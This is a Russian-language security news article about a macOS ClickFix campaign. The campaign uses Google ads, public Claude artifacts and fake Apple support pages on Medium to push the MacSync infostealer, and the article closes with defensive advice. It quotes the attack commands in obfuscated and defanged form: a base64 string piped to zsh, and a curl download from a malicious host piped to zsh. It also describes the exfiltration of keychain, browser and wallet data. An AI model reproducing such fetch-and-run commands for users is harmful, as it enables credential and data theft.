Исследователи зафиксировали новую волну ClickFix-атак на macOS, в рамках которой злоумышленники комбинируют платную рекламу в Google и публичные артефакты чат-бота Claude от Anthropic. Цель кампании — заставить пользователей вручную выполнить в терминале команду, загружающую инфостилер MacSync. По оценкам Moonlock Lab, один из таких вредоносных гайдов в артефактах Claude уже набрал более 15 600 просмотров, что указывает на широкий охват кампании.
ClickFix: социальная инженерия через «помощь» в решении проблем
ClickFix — это класс атак, основанных на социальной инженерии, когда жертву убеждают самостоятельно скомпрометировать свою систему. Вместо автоматической загрузки вредоносного ПО пользователю навязывают идею, что он должен скопировать и запустить некую «диагностическую» или «исправляющую» команду.
В классическом сценарии ClickFix-атак, ориентированных на Windows, пользователям предлагают запускать команды PowerShell для якобы устранения проблем с отображением страниц, исправления ошибок браузера или прохождения «проверки безопасности». Часто злоумышленники имитируют BSOD, искусственно тормозят работу браузера или подсовывают фальшивую CAPTCHA, после чего объясняют, что проблему решит определенная команда в консоли.
Хотя исторически основной целью оставались пользователи Windows, специалисты по ИБ уже не раз фиксировали подобные схемы и для macOS и Linux. Новая кампания подтверждает тренд: экосистема Apple все чаще рассматривается злоумышленниками как прибыльная мишень.
Как злоумышленники используют артефакты Claude и Medium
Артефакты Claude — это публичные объекты (инструкции, фрагменты кода, текстовые заметки и др.), созданные пользователями с помощью LLM Claude и размещенные в отдельной зоне на домене claude.ai. На таких страницах явно указано, что содержимое создано пользователем и не проходит модерацию, однако многие пользователи склонны воспринимать их как более доверенный источник.
По данным Moonlock Lab и AdGuard, злоумышленники покупают рекламу в поиске Google по запросам уровня «online DNS resolver», «macOS CLI disk space analyzer», «Homebrew» и другим околотехническим ключевым фразам. Пользователь видит в верхней части выдачи рекламный результат, который кажется релевантным запросу.
Клик по объявлению перенаправляет жертву либо на публичный артефакт Claude с «пошаговой инструкцией», либо на фальшивую страницу «поддержки Apple» на платформе Medium. В обоих случаях итог один: пользователя подталкивают скопировать предложенную команду и запустить ее в терминале macOS.
Команды в терминале и загрузка инфостилера MacSync
Исследователи выделяют два основных варианта вредоносных команд. В первом случае используется конструкция вида:
echo «…» | base64 -D | zsh
Пользователю объясняют, что это некая «служебная» команда. На деле через base64-декодирование и оболочку zsh загружается и выполняется скрипт-загрузчик.
Во втором варианте применяется команда вида:
true && cur»»l -SsLfk —compressed «https://raxelpak[.]com/curl/[hash]» | zsh
Здесь задействован стандартный для macOS инструмент curl, который скачивает и немедленно передаёт загруженный код на выполнение оболочке zsh. Оба варианта в итоге получают на систему жертвы загрузчик малвари MacSync, специализирующейся на кражe конфиденциальных данных.
Поведение MacSync: кража keychain, криптокошельков и данных браузера
После проникновения MacSync устанавливает соединение с управляющим сервером, используя жестко закодированные токен и API-ключ. Для маскировки малварь подделывает user-agent, имитируя стандартный трафик браузера macOS, что затрудняет детектирование на сетевом уровне.
Ответ от C2-сервера напрямую передается в osascript, который выполняет команды AppleScript. Именно AppleScript-логика отвечает за фактическое хищение данных: содержимого keychain, сохраненных паролей и cookies браузера, информации криптокошельков и других чувствительных артефактов.
Собранные данные упаковываются в архив /tmp/osalogging.zip и отправляются на сервер злоумышленников по адресу a2abotnet[.]com/gate по протоколу HTTP POST. Если передача не проходит, архив дробится на части, и система делает до восьми повторных попыток. После успешной отправки малварь удаляет свои следы, снижая шансы на последующий форензический анализ.
Связь с предыдущими кампаниями и общие тенденции
Похожая инфраструктура и техника уже применялись для распространения стилера AMOS, также ориентированного на macOS. В декабре 2025 года специалисты по ИБ регистрировали ClickFix-кампании, в которых через рекламу продвигались «полезные» чат-сессии с ChatGPT и Grok. Текущая активность с использованием артефактов Claude логично продолжает эту тенденцию: злоумышленники системно осваивают публичные возможности больших языковых моделей и площадок с пользовательским контентом.
С учетом того, что многие пользователи macOS по-прежнему считают свою платформу «по умолчанию безопасной», подобные социально-инженерные схемы оказываются особенно эффективными. Сочетание доверия к брендам (Apple, Google, известные LLM), платной рекламы и технически выглядящих команд повышает вероятность успешной компрометации.
Для снижения рисков пользователям macOS рекомендуется критически относиться к любым инструкциям, предлагающим запускать команды в терминале, особенно если они получены из рекламы, случайных блогов, артефактов LLM или неофициальных гайдов. Важно использовать только проверенные источники (официальная документация, репозитории разработчиков, известные сайты поддержки), а также применять современные средства защиты: включенную проверку Gatekeeper, актуальные обновления системы, специализированные решения для защиты от малвари и мониторинг подозрительной активности.
Организациям имеет смысл дополнять технические меры обучением сотрудников основам безопасной работы с ИИ-инструментами, рекламными ссылками и консольными командами. Учитывая растущую популярность LLM и их артефактов, именно грамотность пользователей становится ключевым фактором, способным остановить подобные ClickFix-атаки еще до ввода первой команды в терминале.